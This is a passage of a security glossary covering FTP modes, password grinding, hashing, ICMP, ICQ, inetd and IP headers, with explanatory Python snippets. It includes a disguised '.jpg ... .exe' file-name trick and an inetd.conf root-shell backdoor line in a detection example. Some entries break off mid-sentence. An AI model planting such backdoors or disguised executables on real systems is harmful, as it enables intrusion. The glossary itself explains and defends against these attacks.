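    parts = ip_address.split(".") + [str(port // 256), str(port % 256)]
    return "PORT " + ",".join(parts)


print(parse_port_argument("192,2,0,201,10,1"))
print(format_port_command("192.0.2.123", 2597))
```

The second call reproduces the PORT line used in the protocol trace later in this entry.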

Key point: An outgoing connection is used for control, but the data is sent on an incoming connection. Packet filtering firewalls block incoming connections. Therefore, a user will see that they can connect to the FTP server, but directory listings and file transfers don't work.

Key point: In order to solve the incoming connection problem, FTP supports a mode called PASV that forces all connections to be outgoing. Web-browsers like IE and Netscape use PASV mode by default. Command-line FTP clients typically don't support PASV; but people try "quote PASV" commands anyway.
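
In PASV mode the roles are reversed: the server announces an address and port in its 227 reply, and the client connects out to it. A rough Python sketch of how a client might pull that endpoint out of the reply follows. The function name parse_pasv_reply is an assumption for illustration, and real servers vary somewhat in the text surrounding the numbers.

```python
import re


def parse_pasv_reply(line):
    """Extract (ip_address, port) from a '227 Entering Passive Mode (...)' reply."""
    match = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", line)
    if not line.startswith("227") or match is None:
        raise ValueError(f"not a usable PASV reply: {line!r}")
    numbers = [int(group) for group in match.groups()]
    ip_address = ".".join(str(value) for value in numbers[:4])
    port = numbers[4] * 256 + numbers[5]  # same high/low byte rule as PORT
    return ip_address, port


print(parse_pasv_reply("227 Entering Passive Mode (209,31,36,212,6,123)."))
```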

Key point: Lots of FTP servers have buffer overflow exploits in them.

Key point: The control connection is text based, so you can use Telnet or netcat as your client (if you understand the protocol).

Protocol:
-> Connection from client to ftp.robertgraham.com:21
<-220 ftp.robertgraham.com Microsoft FTP Service (Version 4.0).
->USER anonymous
<-331 Anonymous access allowed, send identity (e-mail name) as password.
->PASS test@robertgraham.com
<-230 Anonymous user logged in.
->PORT 192,0,2,123,10,37
<-200 PORT command successful.
->RETR /example.txt
<-150 Opening ASCII mode data connection for example.txt(14 bytes).

<- Connection from ftp.robertgraham.com:20 to client:2597
<- File contents
<- Close connection

<-226 Transfer complete.
->QUIT
<-221
-> Close connection
An example with a PASV connection is:
-> Connection from client to ftp.robertgraham.com:21
<-220 ftp.robertgraham.com Microsoft FTP Service (Version 4.0).
->USER anonymous
<-331 Anonymous access allowed, send identity (e-mail name) as password.
->PASS mozilla@
<-230 Anonymous user logged in.
->PASV
<-227 Entering Passive Mode (209,31,36,212,6,123).
->RETR /example.txt

-> Connection from client to ftp.robertgraham.com:1659

<-125 Data connection already open; Transfer starting.

<- File contents
<- Close connection

<-226 Transfer complete.
->QUIT
<-221
-> Close connection
A common attack against this protocol is to scan for banners that indicate vulnerable versions. Common vulnerabilities are buffer overflows in the USER name and PASSword fields. An interesting attack is via

- G -

grind [2]

To continually guess passwords to find the correct one.

Analogy: If someone steals your bank card, they cannot sit in front of the cash machine and guess all possible PIN numbers. After a certain number of unsuccessful tries, the bank machine will "eat" the card.

Key point: Secure systems (UNIX, Windows NT) lock out accounts after a certain number of unsuccessful tries. These lock-outs can either be temporary (and restore themselves automatically), or permanent until an administrator intervenes and unlocks the account.

Key point: Non-secure systems (Win9x and many software applications) do not lock out accounts. For example, if you have Win9x "File and Print Sharing" turned on and protected with a password, a hacker can try continuously and invisibly to gain access to your machine. Nothing is logged, nothing is locked out.

Contrast: When brute-force cracking, the hacker does all the calculations himself (comparing them against the stolen encrypted password file). When doing a grind, the hacker must enter the passwords one by one, and the target system does the calculations to see if they are valid. An intrusion detection system can detect grinds, but not cracks.
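
A lock-out of the kind described above can be sketched in Python as follows. The class name LoginGuard and the three-try limit are assumptions for illustration only, and the plaintext password table is there purely to keep the example short; a real system would store hashes.

```python
class LoginGuard:
    """Counts failed logins per account and locks the account at a limit."""

    def __init__(self, passwords, max_failures=3):
        self.passwords = passwords        # illustration only: plaintext table
        self.max_failures = max_failures
        self.failures = {}
        self.locked = set()

    def attempt(self, user, password):
        if user in self.locked:
            return "locked"               # even the right password is refused
        if self.passwords.get(user) == password:
            self.failures[user] = 0
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.failures[user] >= self.max_failures:
            self.locked.add(user)         # stays locked until an admin clears it
        return "denied"


guard = LoginGuard({"alice": "s3cret"})
results = [guard.attempt("alice", guess) for guess in ["a", "b", "c", "s3cret"]]
print(results)
```

After the third wrong guess the grind is over: the fourth attempt is refused even though it carries the correct password.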

grok [2]

To understand, utterly.

History: The word comes from the book Stranger in a Strange Land by Robert Heinlein. This was a popular counter-culture book in the 1960s, and is a popular Science Fiction book today.

Key point: One of the precepts of Zen philosophy is that the important concepts of life cannot be described by words, and therefore there exists no written description to the path of enlightenment. Grokking means to understand something at a level beyond what mere words can express.

Key point: There are three levels of understanding, which can be illustrated by looking at a car's engine. At the first level, people look at all the parts and say to themselves "This is unnecessarily complicated, I'm sure there is a way we can remove many of these parts and make it simpler". Probably 99% of the population approaches life in this manner. The second level is an engineer who understands how the engine works, and how the various parts work together in the ingenious fashion that they do. This engineer understands that this is the simplest way to produce an engine, and that it has reached this stage after years of being perfected by countless engineers. At the third level is the godlike engineer that understands how to remove one part in order to make the engine even simpler. In this analogy, the engine is the computer. Likewise, the Internet is populated by script-kiddies who are constantly searching for ways to learn about hacking without being bothered by all the unnecessary complexity.

Key point: The failure to grok is often due to failure to understand the correct abstractions. Understanding a thing requires understanding the context in which that thing lives. If one cannot step out of a traditional context in order to regard a thing within the proper context, one cannot grok it. For example, many people have trouble grokking the layering of network protocols because they can only see what the protocols do for them, not what the protocols do in general. Therefore, when they look at protocols, all they see is large amounts of inscrutable unnecessary complexity.

- H -

hacker [1]

A hacker is someone who is able to manipulate the inner workings of computers, information, and technology.

Consider Arthur C. Clarke's Third Law: "Any sufficiently advanced technology is indistinguishable from magic". Since normal people have no clue as to how computers work, they often view hackers with suspicion and awe (as magicians, sorcerers, witches, and warlocks). This suspicion leads to the word "hacker" having the connotation of someone up to no good.

History: The word "hacker" started out in the 14th century to mean somebody who was inexperienced or unskilled at a particular activity (such as a golf hacker).

In the 1970s, the word "hacker" was used by computer enthusiasts to refer to themselves. This reflected the way enthusiasts approach computers: they eschew formal education and play around with the computer until they can get it to work. (In much the same way, a golf hacker keeps hacking at the golf ball until they get it in the hole).

Furthermore, the more "experts" learn about the technology, the more they realize how much they don't know (especially about the implications of technology). When experts refer to themselves as "hackers", they are making a Socratic statement that they truly know nothing. For more information on this connotation, see ESR's computer enthusiast "Jargon File".

Key point: Today if you do a quick search of "hacker" in a search engine, you will still see occasional uses of the word in the senses used in the 1400s and 1970s, but the overwhelming usage in the 1990s describes people who break into computers using their sorcerous ways. Likewise, the vast majority of websites with the word "hack" in their title refer to illegitimate entry into computer systems, with notable exceptions like http://www.hacker.com (which refers to golf).

Controversy: The computer-enthusiast community often refers to any malicious hacker as a "cracker". The security community restricts the use of the word "cracker" to someone who breaks encryption and copy-protection schemes.

Consequently, a journalist who writes about cybercriminals cannot use either word without receiving hate mail from the opposing community claiming they are using the word incorrectly. If a journalist writes about hackers breaking into computers, they will receive hate mail claiming that not all hackers are malicious, and that the correct word is "cracker". Likewise, if they write about crackers breaking into computers, they will receive hate mail claiming that crackers only break codes, but it's hackers who break into systems. The best choice probably depends upon the audience; for example, one should definitely talk about malicious crackers in a computer-enthusiast magazine like "Linux Today".

harden [3]

The word "harden" implies putting a shell around a computer in order to protect it from intruders. In order to harden a system, you should consider the following techniques:

Patch the OS with the latest security fixes. For example, when the "ping-of-death" DoS attack came out, many people needed to patch their TCP/IP stacks to defend against it.
Patch the exposed services with the latest security fixes. For example, many third-party mail servers have been vulnerable to buffer overflow exploits. These are normally fixed a few weeks after being published in the hacker community. Therefore, you need to regularly check with the software vendor for the latest patch.
Remove all defaults. In order to make their software easy-to-use, vendors include default accounts, default passwords, and samples. However, these can generally be exploited by hackers. You MUST read security guidelines for the particular OS or software package (especially web-server) and carefully remove these defaults/samples, or your box WILL be hacked. For example, most Microsoft IIS 4 webservers can be compromised with either the .htr buffer overflow or RDO exploits, because webmasters forget (or don't know) to turn them off.
Remove all unnecessary services. For example, most Sun Solaris based systems can be hacked through the RPC services.
Install packet filtering software. This can either be a firewall

hash [3]

A technique for running data through mathematical operations in order to generate a unique "fingerprint". Any change in the data, either accidental or intentional, results in a completely different fingerprint.

Example: The program "tripwire" detects intrusions by calculating a hash of all programs. On a regular basis, it recalculates the hash. If a file has changed, then tripwire will detect a change in the hash. Therefore, one of the first things hackers will do when breaking into a system is to search for such processes running. (Simply looking for the md5 program is a dead giveaway).

Key point: A hash is "one-way" or "nonreversible". This means that a hash cannot be used to recover the original data.

Key point: A typical hash creates a 128-bit value. This means that there must exist multiple messages that generate the same hash. However, while this can happen in theory, we pretend it can't happen in practice. This is less likely to happen than an asteroid colliding with the Earth destroying all life within the next 100 years.

Key point: Another word for "hash" is message digest.

Key point: The MD5 (Message Digest 5) is the most popular hashing algorithm at this point.
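
The fingerprint idea, and the tripwire-style comparison against a stored baseline, can be sketched with Python's standard hashlib module. This is a toy illustration, not how tripwire itself is implemented: the file names and contents are made up, files are modeled as an in-memory dictionary, and MD5 is used only because this entry names it (the same module also offers newer algorithms such as SHA-256).

```python
import hashlib


def fingerprint(data):
    """Return the MD5 digest of a byte string as 32 hex digits (128 bits)."""
    return hashlib.md5(data).hexdigest()


def changed_files(baseline, current):
    """Names in `current` whose fingerprint is new or differs from the baseline."""
    return sorted(name for name, data in current.items()
                  if baseline.get(name) != fingerprint(data))


# Hypothetical file contents standing in for programs on disk.
files = {"/bin/login": b"original program bytes",
         "/bin/ls": b"listing program bytes"}
baseline = {name: fingerprint(data) for name, data in files.items()}

files["/bin/login"] = b"original program bytes!"  # a single byte appended

print(changed_files(baseline, files))     # only the altered file is reported
print(hashlib.md5().digest_size * 8)      # digest width in bits
```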

hex (hexadecimal)[1]

In computer science, hexadecimal refers to base-16 numbers. These are numbers that use digits in the range: 0123456789ABCDEF. In the C programming language (as well as Java, JavaScript, C++, and other places), hexadecimal numbers are prefixed by a 0x. In this manner, one can tell that the number 0x80 is equivalent to 128 decimal, not 80 decimal.

Key point: Hex is so important because 4 bits have 16 possible combinations. Therefore, a 4-bit value can be represented by a single hex digit. In this manner, every byte (8 bits) can be represented by two hex digits.

Key point: Script kiddies tend to dismiss hexadecimal as one of those "unnecessary details". In reality, you must be able to comfortably do hex math in your head, and freely convert with binary. You should also be able to interpret hexdumps, where a block of data is dumped out into columns of hex numbers. A tutorial for this is at http://www.robertgraham.com/pubs/sniffing-faq.html#hexadecimal.
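
For practice, the conversions and a bare-bones hexdump can be reproduced in Python. The hexdump function below is a hypothetical helper written for this illustration; its column layout is just one common convention.

```python
def hexdump(data, width=16):
    """Format bytes as offset, hex columns, and printable ASCII."""
    pad = width * 3 - 1  # room for `width` two-digit values separated by spaces
    lines = []
    for start in range(0, len(data), width):
        chunk = data[start:start + width]
        hex_part = " ".join(f"{byte:02X}" for byte in chunk)
        text_part = "".join(chr(byte) if 32 <= byte < 127 else "."
                            for byte in chunk)
        lines.append(f"{start:04X}  {hex_part:<{pad}}  {text_part}")
    return "\n".join(lines)


print(0x80)              # hex literal to decimal
print(f"{0x80:08b}")     # the same byte in binary: one hex digit per 4 bits
print(int("30", 16))     # parsing a hex string
print(hexdump(b"GET / HTTP/1.0\r\n\r\n"))
```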

Key point: My mother, an otherwise avowed computerphobe, calculates her age in hex. She is in her early 0x30s. (For those who cannot do the math as well as my mom, 0x30 == 3*16 == 48).

HHGTTG [1]

The book The Hitchhiker's Guide to the Galaxy by Douglas Adams. Many cultural references in the hacking community refer to this book. It is popular because it demonstrates much of the lateral, zen-like thinking used in hacking.

Example: The following quote describes a social engineering attack:

The Hitchhiker's Guide to the Galaxy has a few things to say on the subject of towels.
A towel, it says, is about the most massively useful thing an interstellar hitchhiker can have. Partly it has great practical value. You can wrap it around you for warmth as you bound across the cold moons of Jaglan Beta; you can lie on it on the brilliant marble-sanded beaches of Santraginus V, inhaling the heady sea vapors; you can sleep under it beneath the stars which shine so redly on the desert world of Kakrafoon; use it to sail a miniraft down the slow heavy River Moth; wet it for use in hand-to-hand combat; wrap it round your head to ward off noxious fumes or avoid the gaze of the Ravenous Bugblatter Beast of Traal (a mind-bogglingly stupid animal, it assumes that if you can't see it, it can't see you-daft as a brush, but very very ravenous); you can wave your towel in emergencies as a distress signal, and of course dry yourself off with it if it still seems to be clean enough.
More importantly, a towel has immense psychological value. For some reason, if a strag (strag: nonhitchhiker) discovers that a hitchhiker has his towel with him, he will automatically assume that he is also in possession of a toothbrush, washcloth, soap, tin of biscuits, flask, compass, map, ball of string, gnat spray, wet-weather gear, space suit, etc., etc. Furthermore, the strag will then happily lend the hitchhiker any of these or a dozen other items that the hitchhiker might accidentally have "lost." What the strag will think is that any man who can hitch the length and breadth of the Galaxy, rough it, slum it, struggle against terrible odds, win through and still know where his towel is, is clearly a man to be reckoned with.
Hence a phrase that has passed into hitchhiking slang, as in "Hey, you sass that hoopy Ford Prefect? There's a frood who really knows where his towel is." (Sass: know, be aware of, meet, have sex with; hoopy: really together guy; frood: really amazingly together guy.)

Key point: The answer to life, the universe, and everything is 42.

hijack[3]

An attack whereby the hacker attempts to take over one side of an existing (authenticated) connection. Since authentication generally takes place only at the start of a connection, this will allow the hacker to fully masquerade as the other side without further security checks.

Example: ISPs generally reassign IP addresses of dialing users very quickly after a previous user hung up. Take for example where Alice dials up the Internet, telnets to a host, then for some reason hangs up without gracefully closing the connection. Now consider Mark, who dials-up later and is assigned the same IP address. Let's say that Mark has created his own TCP/IP stack that automatically hijacks any existing connection. The server then sends some response packet back across the connection to Alice (really Mark). At that point, Mark's stack automatically picks up the connection and continues the protocol. At this point, Mark can do anything he wants on Alice's account.

Example: Similar to above, hackers often hijack connections by first nuking one end of the connection, then spoofing that side's IP address.

Example: Spammers scour the Internet looking for open USENET NNTP servers. If they find a server they can post floods of spam through, this is known as "hijacking" the server.

honeypot[4]

An intrusion detection system that pretends to be a valid system, possibly even one that can easily be exploited in order to break into the system.

Misunderstanding: A common misconception is that advertising the system or inviting hackers in causes you to lose all rights to prosecute the hacker. Honeypots do not advertise themselves nor invite hackers. They simply sit on the network waiting to be discovered and hacked. If a hacker doesn't search them out, they won't find them. Similarly, honeypots can contain legal notices in their banners telling hackers to go away.

H/P/V/C/A (Hack/Phreak/Virii/Crack/Anarchy)[2]

A common abbreviation that represents much of the hacking underground. The organizing principle of the underground is that of anarchy, in particular cybercrimes like cracking software, creating viruses, phreaking the phone system, and hacking into computers.

Culture: The term is an outgrowth of the older abbreviation "h/p" (hack/phreak).

HTTP [1]

Hyper-Text Transfer Protocol.

Key point: HTTP is text based, so you can use Telnet or netcat as your client (if you understand the protocol). For example, you can telnet www.example.com 80 to connect to a web-service and enter the command GET / HTTP/1.0<cr><cr> in order to download the home page.
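
The same exchange can be scripted. The sketch below uses Python's standard socket module; the function names are hypothetical. Note that on the wire each line ends with a carriage return and line feed pair, so the blank line that ends the request is sent as "\r\n\r\n".

```python
import socket


def build_request(path="/"):
    """Return the raw bytes of a minimal HTTP/1.0 GET request."""
    return f"GET {path} HTTP/1.0\r\n\r\n".encode("ascii")


def fetch(host, port=80, path="/"):
    """Send the request and return everything the server sends back."""
    with socket.create_connection((host, port), timeout=10) as connection:
        connection.sendall(build_request(path))
        chunks = []
        while True:
            chunk = connection.recv(4096)
            if not chunk:          # an HTTP/1.0 server closes when it is done
                break
            chunks.append(chunk)
    return b"".join(chunks)


print(build_request())
# fetch("www.example.com") would return the status line, headers, and page.
```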

- I -

ice (Intrusion Countermeasure Electronics) [2]

In hacker culture, the word ice refers to anti-hacker countermeasures. The term was originally coined by William Gibson in his book Neuromancer. In this book, Gibson describes various ways that "ice" protects systems from hacker intrusions.

ICMP (Internet Control Message Protocol) [1]

In the TCP/IP suite, ICMP serves as a simple control protocol.

Contrast: Whereas the protocols TCP and UDP carry data, ICMP carries only control messages. Therefore, it is unlikely that a hacker can break into your machine using ICMP. However, evildoers can use ICMP for other purposes:

They can sometimes reroute traffic so that they can spy on your machine.
They can DoS your machine.
They use pings and other ICMP messages to scan your systems.

Misunderstanding: Packet filtering firewalls work by filtering source/destination ports in the TCP or UDP transport protocols. However, as a secondary function, they also filter ICMP type and code numbers. In order to simplify configuration, they sometimes call these fields "ports" in order to make the configuration similar to TCP or UDP.

Key point: A common question is which ICMP traffic should be filtered by a firewall. ICMP consists of "control" messages, some of which are needed, others are desirable, and still others can be used to cause problems on your network. At minimum, you need to allow "can't fragment" messages so that TCP path MTU discovery works. People usually like to allow such packets as "destination unreachable" so that connections time out faster with a more helpful error message. Likewise, users like to do pings and traceroutes through the firewall. Other than that, all other packets should be filtered. In particular, ICMP router advertisements and redirects are extremely bad to allow through your firewall.
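
One way to read the advice above is as a small decision table keyed on ICMP type and code. The Python sketch below is only an interpretation of that paragraph, not a recommended production policy; the function name icmp_verdict is hypothetical, and the type and code numbers are the standard ones listed in the table later in this entry.

```python
ECHO_REPLY = 0
UNREACHABLE = 3
REDIRECT = 5
ECHO_REQUEST = 8
ROUTER_ADVERT = 9
TIME_EXCEEDED = 11
NEED_FRAG = 4  # code under type 3: "fragmentation needed but DF set"


def icmp_verdict(icmp_type, code):
    """Return 'allow' or 'deny' following the key point above."""
    if icmp_type == UNREACHABLE and code == NEED_FRAG:
        return "allow"   # required, or TCP path MTU discovery breaks
    if icmp_type == UNREACHABLE:
        return "allow"   # desirable: faster, more helpful errors
    if icmp_type in (ECHO_REQUEST, ECHO_REPLY, TIME_EXCEEDED):
        return "allow"   # pings and traceroutes
    return "deny"        # everything else, including redirects and adverts


for packet in [(3, 4), (11, 0), (REDIRECT, 0), (ROUTER_ADVERT, 0)]:
    print(packet, icmp_verdict(*packet))
```

A real firewall would also consider direction and rate limits, which this sketch leaves out.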

ICMP Format:

An ICMP header is 8-bytes (64-bits) long. It may contain more data depending upon the exact operation being performed.


    0                   1                   2                   3

    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |     Type      |     Code      |          Checksum             |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

   |                                                               |

   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Type: This 8-bit field contains the major type number. See http://www.robertgraham.com/pubs/firewall-seen.html#icmp for more information.
Code: This 8-bit field contains the minor type (or subtype). For many types, it is simply zero.
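
To make the layout concrete, the following Python sketch packs and unpacks an echo request with the standard struct module. The function names are hypothetical. For echo messages the second 32-bit word of the header holds an identifier and a sequence number, and the checksum is the usual Internet one's-complement sum computed with the checksum field set to zero.

```python
import struct


def internet_checksum(data):
    """One's-complement sum of 16-bit words, as used by ICMP."""
    if len(data) % 2:
        data += b"\x00"                      # pad to a whole number of words
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_request(identifier, sequence, payload=b""):
    """Build an ICMP echo request (type 8, code 0) with a valid checksum."""
    header = struct.pack("!BBHHH", 8, 0, 0, identifier, sequence)
    checksum = internet_checksum(header + payload)
    return struct.pack("!BBHHH", 8, 0, checksum, identifier, sequence) + payload


def parse_icmp(packet):
    """Return (type, code, checksum) from the first four header bytes."""
    return struct.unpack("!BBH", packet[:4])


packet = build_echo_request(identifier=1, sequence=1, payload=b"abc")
print(parse_icmp(packet))
print(internet_checksum(packet))  # a correctly checksummed packet sums to 0
```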

ICMP Type/Codes:

The full list of these codes is at: http://www.isi.edu/in-notes/iana/assignments/icmp-parameters

Type Code Name (symbol): Summary

0 * Echo Reply (ICMP_ECHOREPLY, ping reply): A response to a ping. Many firewalls allow ping responses so that internal people can gain access to external resources. Therefore, they are an effective flooding technique. This means they also work well as a covert channel. The massive DDoS attacks that took down the major Internet portals used commands embedded within ping responses to initiate the attacks. One of the attacks also used ping replies to flood the servers.
    Firewall: Either block incoming ping responses or rate limit them.
3 * Destination Unreachable (ICMP_UNREACH): An indication back from a host/router that some packet you sent did not reach its destination.
    Firewall: In practice, these are needed simply for helpful error messages explaining why communication failed. The only one strictly needed through a firewall is the one that indicates a router couldn't fragment a packet.
    code 0, Net Unreachable (ICMP_UNREACH_NET): Route configuration problem or incorrectly specified IP address.
    code 1, Host Unreachable (ICMP_UNREACH_HOST): The router one hop before the desired host could not ARP the host.
    code 2, Protocol Unreachable (ICMP_UNREACH_PROTOCOL): The receiver of the packet does not have anything that recognizes the specified IP protocol of the packet.
        Key point: This is almost never seen on the wire in practice, and indicates either an intrusion or some massive configuration error.
    code 3, Port Unreachable (ICMP_UNREACH_PORT): The server tells the client that nobody is listening at the port the client attempted to contact.
    code 4, Fragmentation Needed but DF set (ICMP_UNREACH_NEEDFRAG): Important: If you are seeing these in your firewall reject logs, then you've misconfigured your firewall. You should allow this packet to pass through, otherwise your clients will see their TCP connections mysteriously hang.
4 * Source Quench (ICMP_SOURCEQUENCH): Congestion on the Internet. Somebody could flood your network with these packets in an attempt to convince your machines to slow down transmitting data.
5 * Redirect (ICMP_REDIRECT): Somebody is trying to redirect your default router. This could be from a hacker trying to execute a man-in-the-middle attack against you by causing you to route through their own machine. [RFC792]
8 * Echo Request (ICMP_ECHO, ping): Ping.
9 * Router Advertisement (ICMP_ROUTERADVERT): There exists a hack against Win9x and Solaris such that a hacker can DoS you by redirecting your default router. A neighboring hacker can also do a man-in-the-middle attack by directing you through his/her router. [RFC1256]
11 * Time Exceeded In Transit (ICMP_TIMXCEED): A packet never reached its target because something timed out.
    code 0, TTL Exceeded (ICMP_TIMXCEED_INTRANS): Router dropped the packet either because of a routing loop or maybe because of a traceroute.
    code 1, Fragment reassembly timeout (ICMP_TIMXCEED_REASS): The host dropped the packet because it didn't receive all the fragments.
12 * Parameter Problem: Something unusual is going on; this probably indicates an attack.
13 * Timestamp (ICMP_TSTAMP) [RFC792]
14 * Timestamp Reply (ICMP_TSTAMPREPLY) [RFC792]

ICQ [1]

An instant messenger service from www.mirabilis.com, now AOL.

Key point: ICQ is a favorite service among hackers, and ICQ features are built into many trojans (such as stealing user's passwords, UINs, or notifying the hacker).

Vulnerabilities: Some versions contain a built-in webserver that under Win9x can be used to access any file on the system. Some versions have a problem such that you can send a file to a victim with the filename:


foo.jpg                                        .exe

This is really a program, but it appears to the user as a .jpg file, so they will simply open it, not realizing it is a program. ICQ inboxes can be easily flooded; there are lots of attacks/countermeasures floating around on the Internet for this. Finding somebody's IP address given their UIN is a hot topic: Mirabilis tries to hide this, but lots of tools exist to discover it anyway.

identd / auth [1]

The identd (also known as auth) service on UNIX can be used to identify the owner of a TCP connection. As the auth name implies, it was originally intended to be used as some sort of authentication mechanism. Nowadays, it is most commonly used simply as a way of logging who does what activity.

Example: When you connect to a UNIX-based mail server, it will usually attempt a reverse connection back to you on the identd port 113. Its goal is simply to log which user was attempting access to the server.

IDS (intrusion detection system) [1]

An IDS is a security countermeasure. It monitors things looking for signs of intruders.

Contrast: A host-based IDS monitors system events, logfiles, and so forth. A network-based IDS monitors network traffic, usually promiscuously.

Contrast: A firewall simply blocks openings into your network/system, but cannot distinguish between good/bad activity. Therefore, if you need to allow an opening to a system (like a webserver), then a firewall cannot protect against intrusion attempts against this opening. In contrast, intrusion detection systems can monitor for hostile activity on these openings.

More: See http://www.robertgraham.com/pubs/network-intrusion-detection.html for more info.

IIS [1]

Microsoft's Internet Information Server.

Key point: At the end of 1999, all freshly installed IIS v4.0 servers were vulnerable to the .htr buffer overflow bug and the RDO exploit. Roughly 90% of IIS servers are not sufficiently hardened against these exploits, and are thus vulnerable to being owned or defaced.

IMAP (Internet Message Access Protocol) IMAP4 [1]

IMAP is a popular protocol for users to retrieve e-mail from servers. It is likely supported by the mail client that you use, such as Netscape or Outlook.

Key point: IMAP is important to hackers because many implementations are vulnerable to buffer overflow exploits. In particular, a popular distribution of Linux shipped with a vulnerable IMAP service that was enabled by default. Therefore, even today, security professionals frequently detect scans directed at port 143 looking for vulnerable IMAP servers.

incident team [3]

A team within a company who is responsible for responding to cyber-attacks.

Key point: The following are useful resources to such a team:

CERT (Computer Emergency Response Team): The oldest incident organization, established in response to the Morris Worm.
CIAC (Computer Incident Advisory Capability): Organization similar to CERT set up by the U.S. DoE (Department of Energy).
http://www.securityfocus.com: They have an INCIDENTS mailing list companion to their BUGTRAQ mailing list where people discuss incidents they've seen.

inetd [3]

The subsystem in UNIX responsible for starting most of the network services. This program works from the principle that one service can listen for incoming traffic on a socket, and when such traffic appears, it can launch the appropriate service to handle it. This allows a single box to support many services without actually having them all run at the same time.

The file /etc/inetd.conf configures this service.

Key point: A common backdoor technique is to place a root shell program in inetd.conf.
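
From the defender's side, this backdoor is easy to look for, because each line of inetd.conf names the user and the program to run. The Python sketch below flags entries that start a shell as root. It is a rough illustration only: the function name, the list of shells, and the sample file are assumptions, and an intruder can just as easily hide a shell behind an innocent-looking program name.

```python
SHELLS = {"/bin/sh", "/bin/csh", "/bin/ksh", "/bin/bash"}  # assumed list


def suspicious_entries(conf_text):
    """Return service names whose inetd.conf entry runs a shell as root."""
    findings = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            continue  # not a complete entry
        # Fields: service, socket type, protocol, wait flag, user, program, args
        service, user, program = fields[0], fields[4], fields[5]
        if user == "root" and program in SHELLS:
            findings.append(service)
    return findings


SAMPLE = """\
# service  socket  proto  wait    user  program            args
ftp        stream  tcp    nowait  root  /usr/sbin/in.ftpd  in.ftpd
ingreslock stream  tcp    nowait  root  /bin/sh            sh -i
"""

print(suspicious_entries(SAMPLE))
```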

infosec (Information Security) [3]

Contrast: The term "information security" distinguishes itself from "physical security".

Key point: The infosec field is often broken down in the following categories:

confidentiality: Prevent unauthorized disclosure of information. (antonym: disclosure)
integrity: Making sure that things cannot be corrupted. (antonym: corruption)
availability: (antonym: Denial-of-Service)
accountability: Making sure that people can be held responsible for their actions. (antonym: anonymity). This includes finding out who violated security policies, as well as such simple things as charging departments for their use of network resources.
non-repudiation: Making sure that both sides of a transaction cannot later deny the transaction took place. (antonym: repudiation/renounce/reject)

Key point: The fields of infosec and hacking are not necessarily related. This is a little confusing. Infosec is the field of assuring that information is secure. Hacking is the field of breaking rules. For example, following infosec best practices, you can validate that a server is secure, data is encrypted, and that only authenticated users can gain access. However, a hacker executing a buffer overflow exploit gains access, bypassing all the security measures.

input validation [3]

A classic programming error that leads to exploits. Programmers do not always verify that the input data is correct. Therefore, the hacker can carefully craft input that compromises the system.

See also: buffer overflow, directory climbing
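
Example: A minimal sketch of validating one kind of input, a user-supplied file name, against directory climbing. The base directory and the function name are hypothetical, and the check is purely textual: it does not resolve symbolic links, which a real server would also need to consider.

```python
import posixpath

BASE_DIR = "/var/www/files"  # hypothetical directory the server may read from

def safe_path(user_supplied):
    """Return the normalized path under BASE_DIR, or None if the input escapes it."""
    # join() discards BASE_DIR if the input is absolute; normpath() collapses "..".
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, user_supplied))
    if candidate == BASE_DIR or candidate.startswith(BASE_DIR + "/"):
        return candidate
    return None

print(safe_path("report.txt"))         # stays inside BASE_DIR
print(safe_path("../../etc/passwd"))   # climbs out, so it is rejected
```

The point is that the program decides what is acceptable and rejects everything else, rather than trusting the input to be well formed.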

IP [4] .

Internet Protocol

Key point: All data on the Internet is carried by IP packets.

Key point: IP is an unreliable datagram protocol, meaning that routers may sometimes drop packets during congestion. A protocol like TCP must be added to IP in order to track packets and resend them if necessary.

Key point: Ordinary programs have little ability to manipulate IP headers, so few defenses have been built against such manipulation. Many hacks rely upon low-level manipulation of headers.

Key point: The IP header is shown below. Since IP is carried across a link between router-router or host-router, link headers like Ethernet, PPP, etc. may come before this header. Likewise, the payload of the IP packet comes after this header.

Format:


    0                   1                   2                   3   
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

Version ^	This 4-bit field always has a value of "0100" (binary) or "4" decimal. Many plan to replace IPv4 with the much more complex IPv6 in order to solve addressing and security issues.
IHL (Internet Header Length) ^	Indicates the length of the IP header, counted in 32-bit words. The header is always 20 bytes long unless options are present.
